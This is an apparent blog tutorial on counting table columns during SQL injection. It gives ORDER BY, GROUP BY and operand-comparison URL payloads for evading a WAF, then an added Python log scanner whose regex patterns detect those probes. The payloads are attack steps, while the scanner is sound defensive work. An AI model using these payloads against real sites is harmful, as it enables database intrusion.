Hi there.
As we already know, the most common way to count the number of columns in a SQL injection attack is with an
ORDER BY query.
For example:
http://example.org/news.php?id=8 order by 5--
If the page loads normally, this shows that 5 is still within the number of columns.
http://example.org/news.php?id=8 order by 6--
Otherwise, if the number already exceeds the column count, an error will appear, and it usually looks like
Unknown column '6' in 'order clause'
From here we know that the number of columns is 5 and can proceed with the SQLi.
http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.
But if you encounter a scenario where you can't use
ORDER BY because of a WAF or some related reason, there are still some ways to count the columns.
1 - Use a GROUP BY query
This is similar to the ORDER BY technique, but instead of ORDER BY we use GROUP BY.
http://example.org/news.php?id=8 group by 5--
If the page loads normally, this shows that 5 is still within the number of columns.
http://example.org/news.php?id=8 group by 6--
Otherwise, if the number already exceeds the column count, an error will appear, and it usually looks like
Unknown column '6' in 'group statement'
2 - Another way is to set a condition such as
( the main query ) = (select 1)
For example,
http://example.org/news.php?id=8 and (select * from news)=(select 1)
Here we try to count the number of columns (using *) in an available table (news),
and the error message will show the number of columns, such as this message
Operand should contain 5 column(s)
Thanks,
@yappare a.k.a p0pc0rn
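
For defenders, the takeaway is that a filter keyed only on ORDER BY misses the GROUP BY and operand-comparison probes described above. The following is an added example, not part of the original post, that flags all three forms in web access logs; the log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Column-count probes described in the post: ORDER BY n, GROUP BY n, and
# the "(select * from t)=(select 1)" operand comparison.
PROBES = {
    "order_by_index": re.compile(r"\border\s+by\s+\d+", re.I),
    "group_by_index": re.compile(r"\bgroup\s+by\s+\d+", re.I),
    "operand_compare": re.compile(
        r"\(\s*select\s+\*\s+from\s+\w+\s*\)\s*=\s*\(\s*select\s+\d+\s*\)", re.I),
}
# Assumed log layout: client IP first, request line in double quotes.
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the names of probes found in a request target, after URL-decoding."""
    _, _, query = target.partition("?")
    decoded = unquote_plus(query)
    return sorted(name for name, rx in PROBES.items() if rx.search(decoded))

def scan(lines):
    """Map client IP -> {probe name: hit count} for lines that contain a probe."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed layout
        ip, target = m.groups()
        for name in classify(target):
            hits[ip][name] += 1
    return {ip: dict(counts) for ip, counts in hits.items()}

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=8%20order%20by%205-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.php?id=8+group+by+6-- HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?id=8%20and%20(select%20*%20from%20news)=(select%201) HTTP/1.1" 200 298',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?id=8 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:00:12 +0000] "GET /search.php?q=group+by+theme HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, counts in scan(SAMPLE_LOG).items():
        print(ip, counts)
```

The last sample line is a benign search containing "group by" without a numeric index, which the patterns deliberately do not flag.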